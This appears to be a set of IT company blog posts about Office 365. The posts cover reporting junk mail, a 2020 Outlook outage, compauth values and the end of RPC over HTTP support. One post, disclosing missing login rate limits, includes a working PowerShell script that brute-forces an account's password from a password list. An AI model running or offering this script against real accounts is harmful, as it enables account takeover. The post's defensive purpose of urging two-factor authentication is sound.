The Report Message add-in for Outlook and Outlook on the web enables people to easily report misclassified email, whether safe or malicious, to Microsoft and its affiliates for analysis. Microsoft uses these submissions to improve the effectiveness of email protection technologies.
People who have the add-in assigned to them will see the following icons:
In Outlook, the icon looks like this:
In Outlook on the web, the icon looks like this:
If you have a junk or phishing message in your inbox, please click this icon and report it accordingly. Junk/spam is classified as unwanted email – usually an advertisement (nutrisystem, unwanted newsletters, etc). Phishing emails are generally emails with links that prompt you to put in your password or respond in a way that reveals personal information.
If you choose Junk, Phishing, or Not Junk, you’ll have the option to send a copy of the message to Microsoft, along with your classification of the message. Please send a copy to Microsoft as this helps improve their database and protects your company and others from similar spam/phishing. If you are unsure the best category, we suggest marking it as junk. The most important thing is submitting it to the Microsoft database – they can organize it how they see fit on their end.
Update: This issue has been resolved and it is now safe to restart Outlook.
Microsoft Outlook on Windows is crashing worldwide due to An issue on Office 365’s servers. If you close out of Outlook and you are on the most recent version your Outlook will probably not re-open. Please refrain from restarting Outlook. This issue is not reported as affecting Outlook on mobile or web. If your Outlook is not working, please call our office at 859-226-9222 and we can apply a workaround or use webmail (https://mail.office365.com) until the issue is resolved at Office 365.
We will update this page when the issue is resolved.
Ongoing Updates 7/16/2020 @ 8:55AM EST – Issue has been resolved per Microsoft. “We’ve confirmed that the issue has been successfully resolved after extended monitoring of our telemetry. If users are continuing to see impact, please restart your Outlook client for the changes to take effect.” – Microsoft 7/15/2020 @ 6:15PM EST – Most users are not experiencing this issue anymore. We suggest not restarting Outlook until this issue is completely resolved. Per Microsoft “Our service telemetry indicates that the vast majority of customers have received our fix; however, we’re still observing some signs of lingering impact to a subset of users. Users that are still impacted may need to restart their Outlook client for the fix to take effect.” 7/15/2020 @ 3:03PM EST – Microsoft is working to fix the issue. The issue is still present. Please refrain from restarting Outlook. 7/15/2020 @ 1:45PM EST – Microsoft is working to fix the issue. The issue is still present. Please refrain from restarting Outlook.
This then made me wonder about composite authentication and what a softpass is.
While SPF, DKIM, and DMARC are all useful by themselves, they don’t communicate enough authentication status in the event a message has no explicit authentication records. Therefore, Microsoft has developed an algorithm that combines multiple signals into a single value called Composite Authentication, or compauth for short. Customers in Office 365 have compauth values stamped into the Authentication-Results header in the message headers.
Message failed explicit authentication (sending domain published records explicitly in DNS) or implicit authentication (sending domain did not publish records in DNS, so Office 365 interpolated the result as if it had published records).
pass
—————————————— Message passed explicit authentication (message passed DMARC, or Best Guess Passed DMARC) or implicit authentication with high confidence (sending domain does not publish email authentication records, but Office 365 has strong backend signals to indicate the message is likely legitimate).
softpass
——————————————Message passed implicit authentication with low-to- medium confidence (sending domain does not publish email authentication, but Office 365 has backend signals to indicate the message is legitimate but the strength of the signal is weaker).
none
——————————————Message did not authenticate (or it did authenticate but did not align), but composite authentication not applied due to sender reputation or other factors.
So essentially, a pass is softpass is when there are no DMARC records, but Office 365 is pretty sure that this domain is the appropriate sender. A pass is when either a DMARC record is published and it passes, or Microsoft is very sure the email is legitimate.
By default, softpass is not marked as junk. I think this is a pretty good setting since not a lot of domains have DMARC setup.
Putting this together real quick. Hoping to get some publicity on it because I think it is a major vulnerability.
Today we were auditing a client’s security and discovered that Office 365 will let you brute force them, all day long. Seemingly without restriction.
I notified an Office 365 representative that this was an issue, and their solution was to enable two factor authentication. However, this doesn’t apply to a lot of admin accounts that exist on Office 365.
The process an attacker would use would be to figure out who the IT director is of a major company, put their email address in this script and test against a password list.
# Login to O365 Import-Module MSOnline # Account you wish to brute force $username = “admin@microsoft.com” # Attempt logins using every password in your password list $x=0 foreach ($password in get-content password_list.txt) { $x=$x+1; Write-Host “Attempt #$x” Write-Host “Trying password $password” $password = $password | ConvertTo-SecureString -asPlainText -Force $O365Cred = New-Object System.Management.Automation.PSCredential($username,$password) $O365Session = New-PSSession –ConfigurationName Microsoft.Exchange -ConnectionUri https://ps.outlook.com/powershell -Credential $O365Cred -Authentication Basic -AllowRedirection Connect-MsolService –Credential $O365Cred #Check a command. If the command has output that means your password is good. $Domains = Get-Msoldomain if ($Domains) { exit } }
It seems Office 365 is not restricting bad login attempts. I’ve been attempting to login for over 3 hours now and have passed 1000+ passwords. I’ve heard that they will reduce the speed at which you can login, but that doesn’t seem like the case based on my data.
Azure Active Directory shows sign in failures
…and even says that “Account is locked because user tried to sign in too many times with an incorrect user ID or password.” which is not true since I can still log in with that account.
Multifactor authentication does prevent this. When the password is guessed correctly I get a login box which forces 2FA on me. This tells me the password is right, I just need to get access to the user’s device, which is much harder from a distance.
Moral of this story, turn on 2FA for your Office 365 Admin accounts. Microsoft can you please do something about this?
Update: Microsoft does have an article with details on how to secure the global admin accounts. One of the best ways is to use a separate account with the username generated by a random password generator + random password + multifactor authentication. https://support.office.com/en-us/article/protect-your-office-365-global-administrator-accounts-6b4ded77-ac8d-42ed-8606-c014fd947560
Microsoft has recently changed text on their RPC over HTTP End-Of-Life page that originally claimed it will not allow Outlook 2007 to connect to Office 365. The new text has been updated to say
RPC over HTTP, also known as Outlook Anywhere, is a legacy method of connectivity and transport between Outlook for Windows and Exchange. In May 2014, Microsoft introduced MAPI over HTTP as a replacement for RPC over HTTP.
Starting on October 31, 2017, RPC over HTTP will no longer be a supported protocol for accessing mail data from Exchange Online. Starting on this date, the following conditions will apply:
Microsoft will not provide support for RPC over HTTP issues (regular or custom).
No code fixes or updates to resolve problems that are unrelated to security will be released.
Additionally, for Office versions that support MAPI over HTTP, Microsoft may elect to override existing registry keys that customer are using in order to force RPC over HTTP use.
Keyword here: support. This essentially means that nothing will happen to users of Outlook 2007 and Office 365, but Microsoft will no longer support the protocol (AKA they won’t support Outlook 2007 connections)
It is still a good idea to move users away from Outlook 2007. We feel any calls to Office 365 with Outlook 2007 running will be met with resistance from the support staff. Additionally, Microsoft may change their stance on this in the future.
CSSI provides businesses with IT services including Office 365 support and migrations. Contact CSSI for more information on how you can improve your Office 365 infrastructure!
